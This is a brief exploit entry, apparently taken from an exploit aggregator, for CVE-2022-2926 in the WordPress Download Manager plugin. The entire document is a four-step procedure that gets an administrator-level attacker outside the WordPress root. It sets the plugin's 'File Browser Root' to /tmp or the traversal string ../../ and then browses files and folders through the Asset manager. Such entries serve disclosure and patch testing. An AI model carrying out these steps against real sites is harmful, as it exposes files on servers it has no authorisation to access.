Exploit for Download Manager < 3.2.55 - Admin+ Arbitrary File/Folder Access via Path Traversal CVE-2022-2926

## https://sploitus.com/exploit?id=WPEX-ID:2A440E1A-A7E4-4106-839A-D93895E16785
1. Navigate to settings page (/wp-admin/edit.php?post_type=wpdmpro&page=settings)
2. In the “File Browser Root:” setting, put /tmp (v < 3.2.54) or ../../ (v <= 3.2.54)
3. Then navigate to the Asset manager (/wp-admin/edit.php?post_type=wpdmpro&page=wpdm-asset-manager)
4. You will be able to list the files/folders outside of WordPress root directory